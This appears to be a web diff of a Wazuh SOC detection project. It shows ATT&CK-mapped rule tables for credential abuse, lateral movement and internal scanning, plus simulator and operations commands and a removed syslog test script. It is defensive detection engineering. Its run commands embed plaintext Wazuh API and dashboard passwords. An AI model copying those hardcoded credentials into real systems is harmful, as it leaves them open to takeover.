4 ol-474"> 474 
+| ------- | ----- | ----------------------------------------------------------------------- | --------- | ------------------------------- | -------------------- |
475 
+| 100511  | 12    | C2-01: Privileged account used outside business hours                   | T1078.002 | Valid Accounts: Domain Accounts | Privilege Escalation |
476 
+| 100512  | 8     | C2-02: Dormant account activation detected                              | T1078     | Valid Accounts                  | Defense Evasion      |
477 
+| 100513  | 12    | C2-03: Service account interactive logon                                | T1078.003 | Valid Accounts: Local Accounts  | Privilege Escalation |
478 
+| 100514  | 12    | C2-04: Rapid privilege escalation followed by sensitive resource access | T1098     | Account Manipulation            | Persistence          |
479 
+
480 
+### Production Rules
481 
+
482 
+| Rule ID | Level | Event ID | Match Condition                                     | Description                                       | MITRE ID  | Technique                       |
483 
+| ------- | ----- | -------- | --------------------------------------------------- | ------------------------------------------------- | --------- | ------------------------------- |
484 
+| 110511  | 12    | 4624     | `is_admin=true` + `event_type=windows_auth_success` | Privileged account auth success — off-hours       | T1078.002 | Valid Accounts: Domain Accounts |
485 
+| 110512  | 8     | 4624     | `event_type=windows_auth_success` + `legacy.`       | Dormant/legacy account auth success               | T1078     | Valid Accounts                  |
486 
+| 110513  | 12    | 4624     | `is_service=true` + `logon_type=10`                 | Service account interactive logon (type 10)       | T1078.003 | Valid Accounts: Local Accounts  |
487 
+| 110514  | 12    | 4732     | `is_admin=true`                                     | Rapid privilege escalation: group change by admin | T1098     | Account Manipulation            |
488 
+
489 
+**T1078.002 — Valid Accounts: Domain Accounts (Off-Hours)**
490 
+Domain admin activity outside normal business hours (e.g. 2–5am local time) is a known attacker signature — legitimate admins rarely work at those hours but attackers work when defenders are asleep. Requires time-of-day context from the soc-integrator for production correlation.
491 
+
492 
+**T1078.003 — Valid Accounts: Local Accounts (Service Account Interactive Logon)**
493 
+Service accounts are designed for automated processes, not interactive sessions. A service account logging in interactively (logon type 10 = Remote Interactive, or type 2 = Local Interactive) indicates either credential theft or an insider using a service account to evade personal activity tracking.
494 
+
495 
+---
496 
+
497 
+## C3 — Lateral Movement & Internal Reconnaissance
498 
+
499 
+File: `rules/soc-c1-c3-rules.xml` | Decoders: `soc-mvp-windows`, `soc-mvp-windows-lateral` | Source: `source=windows`
500 
+
501 
+**ATT&CK context:** After establishing initial access, attackers move laterally to reach high-value targets (domain controllers, file servers, backup systems). C3 detects the burst patterns that characterise automated lateral movement tools (Cobalt Strike, Impacket, BloodHound) — many hosts contacted in a short time window.
502 
+
503 
+### Simulation Rules
504 
+
505 
+| Rule ID | Level | Use Case                                              | MITRE ID  | Technique                                 | Tactic                     |
506 
+| ------- | ----- | ----------------------------------------------------- | --------- | ----------------------------------------- | -------------------------- |
507 
+| 100521  | 12    | C3-01: Multiple auth successes across different hosts | T1021     | Remote Services                           | Lateral Movement           |
508 
+| 100522  | 12    | C3-02: SMB/RDP lateral movement burst pattern         | T1021.002 | Remote Services: SMB/Windows Admin Shares | Lateral Movement           |
509 
+| 100523  | 15    | C3-03: Admin account accessing many servers rapidly   | T1021.001 | Remote Services: RDP                      | Lateral Movement           |
510 
+| 100524  | 8     | C3-04: Internal scanning / enumeration burst pattern  | T1046     | Network Service Discovery                 | Discovery / Reconnaissance |
511 
+
512 
+### Production Rules
513 
+
514 
+| Rule ID | Level | Event ID | Match Condition                                       | Description                                   | MITRE ID  | Technique                 |
515 
+| ------- | ----- | -------- | ----------------------------------------------------- | --------------------------------------------- | --------- | ------------------------- |
516 
+| 110521  | 12    | 4624     | `dstport=3389` + `event_type=windows_auth_success`    | RDP auth success to remote host               | T1021.001 | Remote Services: RDP      |
517 
+| 110522  | 12    | 4624     | `dstport=445` + `event_type=windows_lateral_movement` | SMB lateral movement burst                    | T1021.002 | SMB/Windows Admin Shares  |
518 
+| 110523  | 15    | 4624     | `is_admin=true` + `event_type=windows_auth_success`   | Admin RDP success to multiple servers rapidly | T1021.001 | Remote Services: RDP      |
519 
+| 110524  | 8     | —        | `event_type=internal_scan`                            | Internal scanning/enumeration burst           | T1046     | Network Service Discovery |
520 
+
521 
+**T1021 — Remote Services (Lateral Movement)**
522 
+An account successfully authenticating to many distinct internal hosts in a short time window (minutes, not hours) is a reliable lateral movement signal. Legitimate admin activity is targeted and intentional; lateral movement tools spray credentials across IP ranges.
523 
+
524 
+**T1046 — Network Service Discovery (Internal Scanning)**
525 
+After initial compromise, attackers scan internal subnets to map the network — identifying domain controllers, databases, backup servers, and other high-value targets. Internal port scanning is anomalous in most environments and should be treated as a high-priority finding.
526 
+
527 
+---
528 
+
529 
+## Rule ID Summary
530 
+
531 
+| Range                                  | Section              | Count   |
532 
+| -------------------------------------- | -------------------- | ------- |
533 
+| 100200, 100205, 100210, 100220, 100230 | Base / grouping      | 5       |
534 
+| 100301–100302 / 110301–110302          | A1 DNS IOC           | 4       |
535 
+| 100311–100320 / 110311–110320          | A2 FortiGate FW      | 20      |
536 
+| 100331–100335 / 110331–110335          | A3 FortiGate VPN     | 10      |
537 
+| 100341–100364 / 110341–110362          | A4 Windows/AD        | 37      |
538 
+| 100401–100403 / 110401–110403          | B1 VMware            | 6       |
539 
+| 100411 / 110411                        | B2 Log Monitor       | 2       |
540 
+| 100421–100426 / 110421–110426          | B3 Sysmon            | 12      |
541 
+| 100501 / 110501–110502                 | C1 Impossible Travel | 3       |
542 
+| 100511–100514 / 110511–110514          | C2 Credential Abuse  | 8       |
543 
+| 100521–100524 / 110521–110524          | C3 Lateral Movement  | 8       |
544 
+| **Total**                              |                      | **115** |
545 
+
546 
+---
547 
+
548 
+## Running the Simulator
549 
+
550 
+```bash
551 
+cd scripts
552 
+
553 
+# Single batch (all use cases)
554 
+WAZUH_API_USER=wazuh-wui WAZUH_API_PASS='MyS3cr37P450r.*-' \
555 
+  python3 send-wazuh-api-sim.py --selector all --batch
556 
+
557 
+# Continuous (all use cases, 65s between rounds to stay under rate limit)
558 
+WAZUH_API_USER=wazuh-wui WAZUH_API_PASS='MyS3cr37P450r.*-' \
559 
+  python3 send-wazuh-api-sim.py --selector all --batch --forever --delay 65
560 
+
561 
+# Single section
562 
+WAZUH_API_USER=wazuh-wui WAZUH_API_PASS='MyS3cr37P450r.*-' \
563 
+  python3 send-wazuh-api-sim.py --selector a2 --batch
564 
+
565 
+# Single use case
566 
+WAZUH_API_USER=wazuh-wui WAZUH_API_PASS='MyS3cr37P450r.*-' \
567 
+  python3 send-wazuh-api-sim.py --selector A2-01 --count 1
568 
+```
569 
+
570 
+## Wazuh Operations
571 
+
572 
+```bash
573 
+# Reload rules (no container restart needed)
574 
+docker exec wazuh-single-wazuh.manager-1 /var/ossec/bin/wazuh-control reload
575 
+
576 
+# Test a single event
577 
+echo 'soc_mvp_test=true source=dns event_type=ioc_dns_traffic src_ip=1.2.3.4' | \
578 
+  docker exec -i wazuh-single-wazuh.manager-1 /var/ossec/bin/wazuh-logtest
579 
+
580 
+# Watch live alerts for SOC rules
581 
+docker exec wazuh-single-wazuh.manager-1 \
582 
+  tail -f /var/ossec/logs/alerts/alerts.json | grep --line-buffered "soc_mvp"
583 
+```

+ 15 - 0
samples/README.md
ファイルの表示 

@@ -0,0 +1,15 @@
1 
+# SOC Production Sample Logs
2 
+
3 
+These files provide realistic sample events aligned with current production-focused Wazuh rules (`110xxx`):
4 
+
5 
+- `appendix-a-production-samples.log`
6 
+- `appendix-b-production-samples.log`
7 
+- `appendix-c-production-samples.log`
8 
+
9 
+Notes:
10 
+
11 
+- FortiGate and VMware lines are raw/syslog-style key-value examples.
12 
+- Windows samples are in compact JSON using Wazuh-decoded field names (`win.system.eventID`, `win.eventdata.*`) so rule intent is explicit.
13 
+- SOC Integrator correlation examples use `soc_event=...` payloads consumed by custom decoders (`soc-prod-dns`, `soc-prod-integrator`).
14 
+
15 
+These are reference samples for testing and documentation, not exact byte-for-byte exports from a single environment.

+ 32 - 423
scripts/README.md
ファイルの表示 

@@ -1,458 +1,67 @@
1 
-# Test Event Scripts
1 
+# Scripts
2 2
3 
-## SOC Integrator UI (`Run Sim Logs`) target mapping
3 
+## Combined Wazuh simulator
4 4
5 
-`/ui -> Systems -> Run Sim Logs` now supports **multi-select Target** values based on selected `Script`.
6 
-The UI starts one simulator run per selected target (except `all`, which runs a single `all` run).
7 
-
8 
-- `fortigate`: `all`, `501E`, `80F`, `60F`, `40F`
9 
-- `endpoint`: `all`, `windows`, `mac`, `linux`
10 
-- `cisco`: `all`, `asa_acl_deny`, `asa_vpn_auth_fail`, `ios_login_fail`, `ios_config_change`
11 
-- `proposal_required`: `all`, `a1`, `a2`, `a3`, `a4`
12 
-- `proposal_appendix_b`: `all`, `b1`, `b2`, `b3`
13 
-- `proposal_appendix_c`: `all`, `c1`, `c2`, `c3`
14 
-- `wazuh_test`: `all`, `ioc_dns`, `ioc_ips`, `vpn_outside_th`, `windows_auth_fail`
15 
-
16 
-## Send Wazuh test events
17 
-
18 
-Use this to inject synthetic SOC events via syslog UDP into Wazuh manager.
5 
+Use one script for all Appendix A/B/C simulation log replay.
19 6
20 7 
 ```bash
21 
-scripts/send-wazuh-test-events.sh [scenario] [count] [delay_seconds]
8 
+scripts/send-wazuh-sim-logs.sh [selector] [count] [delay_seconds] [--forever] [--dry-run]
22 9 
 ```
23 10
24 
-Optional flag:
25 
-
26 
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
27 
-
28 
-Scenarios:
29 
-
30 
-- `ioc_dns`
31 
-- `ioc_ips`
32 
-- `vpn_outside_th`
33 
-- `windows_auth_fail`
34 
-- `all`
35 
-
36 11 
 Examples:
37 12
38 13 
 ```bash
39 
-scripts/send-wazuh-test-events.sh all
40 
-scripts/send-wazuh-test-events.sh vpn_outside_th 5 0.2
41 
-WAZUH_SYSLOG_HOST=127.0.0.1 WAZUH_SYSLOG_PORT=514 scripts/send-wazuh-test-events.sh ioc_ips
42 
-scripts/send-wazuh-test-events.sh all 1 2 --forever
14 
+scripts/send-wazuh-sim-logs.sh all 1 0.2
15 
+scripts/send-wazuh-sim-logs.sh a2 1 0
16 
+scripts/send-wazuh-sim-logs.sh B3-06 1 0
17 
+scripts/send-wazuh-sim-logs.sh c1 1 2 --forever
18 
+scripts/send-wazuh-sim-logs.sh all 1 0 --dry-run
43 19 
 ```
44 20
45 
-Environment overrides:
21 
+Environment variables:
46 22
47 23 
 - `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
48 24 
 - `WAZUH_SYSLOG_PORT` (default `514`)
49 
-- `WAZUH_TEST_SRC_IP`
50 
-- `WAZUH_TEST_DOMAIN`
51 
-- `WAZUH_TEST_USER`
52 
-
53 
-Transport notes:
54 
-
55 
-- Uses `nc` if available.
56 
-- Falls back to Bash UDP redirection (`/dev/udp/host/port`) when `nc` is unavailable.
57 
-
58 
-## Send Cisco device test events
59 
-
60 
-Use this to inject Cisco-style syslog events (ASA/IOS) into Wazuh manager.
25 
+- `DRY_RUN=1` (alternative to `--dry-run`)
61 26
62 
-```bash
63 
-scripts/send-wazuh-cisco-test-events.sh [scenario] [count] [delay_seconds]
64 
-```
65 
-
66 
-Optional flag:
27 
+Selector support:
67 28
68 
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
29 
+- Global: `all`
30 
+- Appendix: `a`, `b`, `c`, `appendix-a`, `appendix-b`, `appendix-c`
31 
+- Section: `a1`, `a2`, `a3`, `a4`, `b1`, `b2`, `b3`, `c1`, `c2`, `c3`
32 
+- Use-case ID: `A1-01` ... `C3-04`
69 33
70 
-Scenarios:
71 
-
72 
-- `asa_acl_deny`
73 
-- `asa_vpn_auth_fail`
74 
-- `ios_login_fail`
75 
-- `ios_config_change`
76 
-- `all`
77 
-
78 
-Examples:
34 
+Sample sources:
79 35
80 
-```bash
81 
-scripts/send-wazuh-cisco-test-events.sh all
82 
-scripts/send-wazuh-cisco-test-events.sh asa_acl_deny 5 0.2
83 
-CISCO_DEVICE_HOST=edge-fw-01 scripts/send-wazuh-cisco-test-events.sh ios_login_fail
84 
-scripts/send-wazuh-cisco-test-events.sh all 1 2 --forever
85 
-```
86 
-
87 
-Environment overrides:
88 
-
89 
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
90 
-- `WAZUH_SYSLOG_PORT` (default `514`)
91 
-- `CISCO_DEVICE_HOST`
92 
-- `CISCO_SRC_IP`
93 
-- `CISCO_DST_IP`
94 
-- `CISCO_VPN_USER`
95 
-- `CISCO_ADMIN_USER`
36 
+- `samples/appendix-a-production-samples.log`
37 
+- `samples/appendix-b-production-samples.log`
38 
+- `samples/appendix-c-production-samples.log`
96 39
97 
-## Send FortiGate firewall test events
40 
+## Dashboard import
98 41
99 
-Use this to inject FortiGate-style syslog events (models `501E`, `80F`, `60F`, `40F`) into Wazuh manager.
42 
+Import Wazuh dashboards (NDJSON):
100 43
101 44 
 ```bash
102 
-scripts/send-wazuh-fortigate-test-events.sh [model] [count] [delay_seconds]
45 
+scripts/import-wazuh-dashboard.sh <path-to-ndjson>
103 46 
 ```
104 47
105 
-Optional flag:
106 
-
107 
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
108 
-
109 
-Models:
110 
-
111 
-- `501E`
112 
-- `80F`
113 
-- `60F`
114 
-- `40F`
115 
-- `all`
116 
-
117 48 
 Examples:
118 49
119 50 
 ```bash
120 
-scripts/send-wazuh-fortigate-test-events.sh all
121 
-scripts/send-wazuh-fortigate-test-events.sh 80F 5 0.2
122 
-WAZUH_SYSLOG_HOST=127.0.0.1 WAZUH_SYSLOG_PORT=514 scripts/send-wazuh-fortigate-test-events.sh 60F
123 
-scripts/send-wazuh-fortigate-test-events.sh all 1 2 --forever
124 
-```
125 
-
126 
-Environment overrides:
127 
-
128 
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
129 
-- `WAZUH_SYSLOG_PORT` (default `514`)
130 
-- `FGT_SRC_IP`
131 
-- `FGT_DST_IP`
132 
-- `FGT_DOMAIN`
133 
-- `FGT_USER`
134 
-
135 
-## Run continuous FortiGate simulation
136 
-
137 
-Use this to generate ongoing FortiGate-like traffic and security events for Wazuh testing.
138 
-
139 
-```bash
140 
-scripts/send-wazuh-fortigate-continuous.sh [profile] [models] [base_delay_seconds]
141 
-```
142 
-
143 
-Profiles:
144 
-
145 
-- `normal` (mostly allowed traffic, occasional admin/vpn/webfilter)
146 
-- `incident` (higher IPS/webfilter/vpn anomalies)
147 
-- `mixed` (balanced baseline + anomalies)
148 
-
149 
-Models:
150 
-
151 
-- `501E`
152 
-- `80F`
153 
-- `60F`
154 
-- `40F`
155 
-- `all`
156 
-
157 
-Examples:
158 
-
159 
-```bash
160 
-scripts/send-wazuh-fortigate-continuous.sh mixed all 0.8
161 
-scripts/send-wazuh-fortigate-continuous.sh incident 80F 0.3
162 
-SIM_MAX_EVENTS=200 scripts/send-wazuh-fortigate-continuous.sh normal 501E 1.0
163 
-```
164 
-
165 
-Environment overrides:
166 
-
167 
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
168 
-- `WAZUH_SYSLOG_PORT` (default `514`)
169 
-- `SIM_MAX_EVENTS` (default `0`, which means run forever)
170 
-- `SIM_SRC_PREFIX` (default `10.10.20`)
171 
-- `SIM_VPN_USER`
172 
-- `SIM_ADMIN_USER`
173 
-
174 
-## Simulate all required logs from proposal
175 
-
176 
-Use this to generate synthetic logs for all use cases listed in:
177 
-`Security Detection & Threat Intelligence Enhancement Proposal-2.md` Appendix A (A1-A4).
178 
-
179 
-```bash
180 
-scripts/send-wazuh-proposal-required-events.sh [selector] [count] [delay_seconds]
181 
-```
182 
-
183 
-Optional flag:
184 
-
185 
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
186 
-
187 
-Selectors:
188 
-
189 
-- `all` (all Appendix A use cases)
190 
-- `a1`, `a2`, `a3`, `a4` (by section)
191 
-- specific use case id, e.g. `A2-01`, `A3-05`, `A4-24`
192 
-
193 
-Examples:
194 
-
195 
-```bash
196 
-scripts/send-wazuh-proposal-required-events.sh all 1
197 
-scripts/send-wazuh-proposal-required-events.sh a3 3 0.5
198 
-scripts/send-wazuh-proposal-required-events.sh A3-05 1
199 
-DRY_RUN=1 scripts/send-wazuh-proposal-required-events.sh all 1
200 
-scripts/send-wazuh-proposal-required-events.sh a2 1 2 --forever
201 
-```
202 
-
203 
-Environment overrides:
204 
-
205 
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
206 
-- `WAZUH_SYSLOG_PORT` (default `514`)
207 
-- `EVENT_DELAY` (default `0.05`)
208 
-- `DRY_RUN` (default `0`, set `1` to print only)
209 
-- `FGT_DEVNAME`, `FGT_DEVID`
210 
-- `WIN_HOST`, `DNS_HOST`
211 
-- `SIM_VPN_USER`
212 
-
213 
-## Simulate Appendix B logs (revise proposal)
214 
-
215 
-Use this to generate synthetic logs for Appendix B (B1-B3) in:
216 
-`Security Detection & Threat Intelligence Enhancement Proposal-revise.md`.
217 
-
218 
-```bash
219 
-scripts/send-wazuh-proposal-appendix-b-events.sh [selector] [count] [delay_seconds]
220 
-```
221 
-
222 
-Optional flag:
223 
-
224 
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
225 
-
226 
-Selectors:
227 
-
228 
-- `all` (all Appendix B use cases)
229 
-- `b1`, `b2`, `b3` (by section)
230 
-- specific use case id, e.g. `B1-01`, `B2-01`, `B3-06`
231 
-
232 
-Examples:
233 
-
234 
-```bash
235 
-scripts/send-wazuh-proposal-appendix-b-events.sh all 1
236 
-scripts/send-wazuh-proposal-appendix-b-events.sh b3 2 0.5
237 
-scripts/send-wazuh-proposal-appendix-b-events.sh B3-06 1
238 
-DRY_RUN=1 scripts/send-wazuh-proposal-appendix-b-events.sh all 1
239 
-scripts/send-wazuh-proposal-appendix-b-events.sh b1 1 2 --forever
240 
-```
241 
-
242 
-Environment overrides:
243 
-
244 
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
245 
-- `WAZUH_SYSLOG_PORT` (default `514`)
246 
-- `EVENT_DELAY` (default `0.05`)
247 
-- `DRY_RUN` (default `0`, set `1` to print only)
248 
-- `VCENTER_HOST`, `ESXI_HOST`, `LOGMON_HOST`, `WIN_SYSMON_HOST`
249 
-- `SIM_USER`
250 
-
251 
-## Simulate Appendix C logs (future enhancement MVP)
252 
-
253 
-Use this to generate synthetic logs for Appendix C (C1-C3) in:
254 
-`Security Detection & Threat Intelligence Enhancement Proposal-revise.md`.
255 
-
256 
-```bash
257 
-scripts/send-wazuh-proposal-appendix-c-events.sh [selector] [count] [delay_seconds]
258 
-```
259 
-
260 
-Optional flag:
261 
-
262 
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
263 
-
264 
-Selectors:
265 
-
266 
-- `all` (all Appendix C use cases)
267 
-- `c1`, `c2`, `c3` (by section)
268 
-- specific use case id, e.g. `C1-01`, `C2-03`, `C3-04`
269 
-
270 
-Examples:
271 
-
272 
-```bash
273 
-scripts/send-wazuh-proposal-appendix-c-events.sh all 1
274 
-scripts/send-wazuh-proposal-appendix-c-events.sh c1 1 0.5
275 
-scripts/send-wazuh-proposal-appendix-c-events.sh C3-04 1
276 
-DRY_RUN=1 scripts/send-wazuh-proposal-appendix-c-events.sh all 1
277 
-scripts/send-wazuh-proposal-appendix-c-events.sh c2 1 2 --forever
278 
-```
279 
-
280 
-Environment overrides:
281 
-
282 
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
283 
-- `WAZUH_SYSLOG_PORT` (default `514`)
284 
-- `EVENT_DELAY` (default `0.05`)
285 
-- `DRY_RUN` (default `0`, set `1` to print only)
286 
-- `VPN_HOST`, `WIN_HOST`
287 
-- `SIM_USER`, `SIM_SERVICE_USER`, `SIM_SRC_IP`
288 
-
289 
-## Simulate endpoint client-agent logs (Windows / macOS / Linux)
290 
-
291 
-Use this to inject realistic endpoint telemetry for client agents into Wazuh.
292 
-
293 
-```bash
294 
-scripts/send-wazuh-endpoint-agent-test-events.sh [platform] [scenario] [count] [delay_seconds]
295 
-```
296 
-
297 
-Optional flag:
298 
-
299 
-- `--forever` (ignore `count` and run continuously until Ctrl+C)
300 
-
301 
-Platforms:
302 
-
303 
-- `windows`
304 
-- `mac`
305 
-- `linux`
306 
-- `all`
307 
-
308 
-Scenarios:
309 
-
310 
-- `auth`
311 
-- `process`
312 
-- `persistence`
313 
-- `privilege`
314 
-- `malware`
315 
-- `all`
316 
-
317 
-Examples:
318 
-
319 
-```bash
320 
-scripts/send-wazuh-endpoint-agent-test-events.sh all all 1 0.2
321 
-scripts/send-wazuh-endpoint-agent-test-events.sh windows process 10 0.1
322 
-DRY_RUN=1 scripts/send-wazuh-endpoint-agent-test-events.sh linux all 1 0
323 
-scripts/send-wazuh-endpoint-agent-test-events.sh all auth 1 2 --forever
324 
-```
325 
-
326 
-Environment overrides:
327 
-
328 
-- `WAZUH_SYSLOG_HOST` (default `127.0.0.1`)
329 
-- `WAZUH_SYSLOG_PORT` (default `514`)
330 
-- `DRY_RUN` (default `0`)
331 
-- `WIN_HOST`, `MAC_HOST`, `LINUX_HOST`
332 
-- `SIM_USER`
333 
-
334 
-## Shuffle sample workflow helpers
335 
-
336 
-Sample playbook design for Shuffle:
337 
-
338 
-- `shuffle-workflows/sample-ioc-playbook.md`
339 
-
340 
-Sample execution payload:
341 
-
342 
-- `scripts/events/shuffle-sample-execution.json`
343 
-
344 
-Trigger an existing Shuffle workflow from CLI:
345 
-
346 
-```bash
347 
-scripts/trigger-shuffle-workflow.sh <workflow_id> [ioc_type] [ioc_value]
348 
-```
349 
-
350 
-Create MVP workflows in Shuffle (from proposal mapping):
351 
-
352 
-```bash
353 
-SHUFFLE_API_KEY=<your_key> scripts/create-shuffle-mvp-workflows.sh
354 
-```
355 
-
356 
-This creates:
357 
-
358 
-- `MVP - IOC Enrichment and Case Routing`
359 
-- `MVP - VPN Geo Anomaly Triage`
360 
-
361 
-## Import Wazuh Dashboard (FortiGate Simulation)
362 
-
363 
-Prebuilt saved objects file:
364 
-
365 
-- `scripts/events/wazuh-fortigate-sim-dashboard.ndjson`
366 
-
367 
-Import helper:
368 
-
369 
-```bash
370 
-scripts/import-wazuh-dashboard.sh
371 
-```
372 
-
373 
-Optional overrides:
374 
-
375 
-```bash
376 
-WAZUH_DASHBOARD_URL=https://localhost \
377 
-WAZUH_DASHBOARD_USER=admin \
378 
-WAZUH_DASHBOARD_PASS=SecretPassword \
379 
-scripts/import-wazuh-dashboard.sh scripts/events/wazuh-fortigate-sim-dashboard.ndjson
380 
-```
381 
-
382 
-After import, open dashboard:
383 
-
384 
-- `SOC FortiGate Simulation Overview`
385 
-
386 
-## Wazuh dashboard files (detailed)
387 
-
388 
-Dashboard saved objects are stored in `scripts/events/*.ndjson`.
389 
-
390 
-- `scripts/events/wazuh-fortigate-sim-dashboard.ndjson`
391 
-
392 
-  - Title: `SOC FortiGate Simulation Overview`
393 
-  - Purpose: FortiGate simulation visibility (events over time, top devices, top event types, severity).
394 
-  - Typical data source: `scripts/send-wazuh-fortigate-test-events.sh`
395 
-
396 
-- `scripts/events/wazuh-client-agents-dashboard.ndjson`
397 
-
398 
-  - Title: `SOC Client Agent Simulation Overview`
399 
-  - Purpose: Endpoint simulation visibility for Windows/macOS/Linux agent logs.
400 
-  - Typical data source: `scripts/send-wazuh-endpoint-agent-test-events.sh`
401 
-
402 
-- `scripts/events/wazuh-proposal-required-dashboard.ndjson`
403 
-
404 
-  - Title: `SOC Proposal Required Logs Overview`
405 
-  - Purpose: Appendix A required-scope logs (A1-A4).
406 
-  - Typical data source: `scripts/send-wazuh-proposal-required-events.sh`
407 
-
408 
-- `scripts/events/wazuh-proposal-appendix-ab-dashboard.ndjson`
409 
-
410 
-  - Title: `SOC Proposal Appendix A+B Overview`
411 
-  - Purpose: Combined Appendix A and B overview, including use-case table.
412 
-  - Typical data sources:
413 
-    - `scripts/send-wazuh-proposal-required-events.sh`
414 
-    - `scripts/send-wazuh-proposal-appendix-b-events.sh`
415 
-
416 
-- `scripts/events/wazuh-proposal-appendix-c-dashboard.ndjson`
417 
-
418 
-  - Title: `SOC Proposal Appendix C Overview`
419 
-  - Purpose: Appendix C MVP scope visibility (currently C1-C3 coverage).
420 
-  - Typical data source: `scripts/send-wazuh-proposal-appendix-c-events.sh`
421 
-
422 
-- `scripts/events/wazuh-proposal-custom-rules-dashboard.ndjson`
423 
-
424 
-  - Title: `SOC Proposal Custom Rules Overview`
425 
-  - Purpose: Monitor custom proposal rules (e.g., 1003xx/1004xx families), severity, and top descriptions.
426 
-  - Typical data source: Any simulation script that triggers proposal custom rules.
427 
-
428 
-### Import any dashboard file
429 
-
430 
-```bash
431 
-scripts/import-wazuh-dashboard.sh scripts/events/<dashboard-file>.ndjson
432 
-```
433 
-
434 
-Examples:
435 
-
436 
-```bash
437 
-scripts/import-wazuh-dashboard.sh scripts/events/wazuh-client-agents-dashboard.ndjson
438 51 
 scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-required-dashboard.ndjson
439 52 
 scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-appendix-ab-dashboard.ndjson
440 53 
 scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-appendix-c-dashboard.ndjson
441 
-scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-custom-rules-dashboard.ndjson
54 
+scripts/import-wazuh-dashboard.sh scripts/events/wazuh-client-agents-dashboard.ndjson
442 55 
 ```
443 56
444 
-Optional overrides:
57 
+## Other helpers
445 58
446 
-```bash
447 
-WAZUH_DASHBOARD_URL=https://localhost \
448 
-WAZUH_DASHBOARD_USER=admin \
449 
-WAZUH_DASHBOARD_PASS=SecretPassword \
450 
-OVERWRITE=true \
451 
-scripts/import-wazuh-dashboard.sh scripts/events/wazuh-proposal-required-dashboard.ndjson
452 
-```
59 
+- `seed-iris-demo-data.sh`: seed IRIS demo cases/tasks via API.
60 
+- `create-shuffle-mvp-workflows.sh`: create Shuffle MVP workflows from templates.
61 
+- `trigger-shuffle-workflow.sh`: trigger a Shuffle workflow by ID.
62 
+- `update-shuffle-workflow-from-template.sh`: update existing Shuffle workflow JSON from template.
453 63
454 
-### Quick troubleshooting
64 
+## Notes
455 65
456 
-- Verify index pattern has data in Discover: `wazuh-alerts-*`.
457 
-- Set time range wide enough (for example `Last 24 hours`).
458 
-- If charts are empty but raw logs exist, re-import the latest NDJSON and refresh index fields.
66 
+- Legacy `send-wazuh-*` simulator scripts were removed and replaced by `send-wazuh-sim-logs.sh`.
67 
+- If you add new sample events, keep comments tagged with use-case IDs (for example `# A2-01 ...`) so selector filtering keeps working.

File diff suppressed because it is too large
+ 6 - 6
scripts/events/wazuh-proposal-custom-rules-dashboard.ndjson


+ 0 - 136
scripts/send-wazuh-cisco-test-events.sh
ファイルの表示 

@@ -1,136 +0,0 @@
1 
-#!/usr/bin/env bash
2 
-set -euo pipefail
3 
-
4 
-SCENARIO="${1:-all}"
5 
-COUNT="${2:-1}"
6 
-DELAY="${3:-0.3}"
7 
-FOREVER="false"
8 
-
9 
-for arg in "${@:4}"; do
10 
-  case "${arg}" in
11 
-    --forever)
12 
-      FOREVER="true"
13 
-      ;;
14 
-    *)
15 
-      echo "error: unexpected argument '${arg}'"
16 
-      echo "usage: scripts/send-wazuh-cisco-test-events.sh [scenario] [count] [delay_seconds] [--forever]"
17 
-      exit 1
18 
-      ;;
19 
-  esac
20 
-done
21 
-
22 
-WAZUH_SYSLOG_HOST="${WAZUH_SYSLOG_HOST:-127.0.0.1}"
23 
-WAZUH_SYSLOG_PORT="${WAZUH_SYSLOG_PORT:-514}"
24 
-
25 
-CISCO_DEVICE_HOST="${CISCO_DEVICE_HOST:-cisco-asa-01}"
26 
-CISCO_SRC_IP="${CISCO_SRC_IP:-198.51.100.25}"
27 
-CISCO_DST_IP="${CISCO_DST_IP:-10.10.10.20}"
28 
-CISCO_VPN_USER="${CISCO_VPN_USER:-vpn.user}"
29 
-CISCO_ADMIN_USER="${CISCO_ADMIN_USER:-admin}"
30 
-
31 
-if ! [[ "${COUNT}" =~ ^[0-9]+$ ]] || [[ "${COUNT}" -lt 1 ]]; then
32 
-  echo "error: count must be a positive integer"
33 
-  exit 1
34 
-fi
35 
-
36 
-if ! [[ "${DELAY}" =~ ^[0-9]+([.][0-9]+)?$ ]]; then
37 
-  echo "error: delay must be numeric (example: 0.5)"
38 
-  exit 1
39 
-fi
40 
-
41 
-emit_syslog() {
42 
-  local msg="$1"
43 
-  local sent="false"
44 
-
45 
-  if command -v nc >/dev/null 2>&1; then
46 
-    if printf "%s\n" "${msg}" | nc -u -w1 "${WAZUH_SYSLOG_HOST}" "${WAZUH_SYSLOG_PORT}"; then
47 
-      sent="true"
48 
-    fi
49 
-  fi
50 
-
51 
-  if [[ "${sent}" != "true" ]]; then
52 
-    if printf "%s\n" "${msg}" >"/dev/udp/${WAZUH_SYSLOG_HOST}/${WAZUH_SYSLOG_PORT}" 2>/dev/null; then
53 
-      sent="true"
54 
-    fi
55 
-  fi
56 
-
57 
-  if [[ "${sent}" != "true" ]]; then
58 
-    echo "error: failed to send syslog event to ${WAZUH_SYSLOG_HOST}:${WAZUH_SYSLOG_PORT}/udp"
59 
-    echo "hint: install netcat or run with bash UDP support (/dev/udp)"
60 
-    return 1
61 
-  fi
62 
-
63 
-  echo "[$(date -u +'%Y-%m-%dT%H:%M:%SZ')] sent: ${msg}"
64 
-}
65 
-
66 
-random_id() {
67 
-  printf "%s" "cisco-evt-$(date +%s)-$RANDOM-$RANDOM"
68 
-}
69 
-
70 
-send_asa_acl_deny() {
71 
-  local eid
72 
-  eid="$(random_id)"
73 
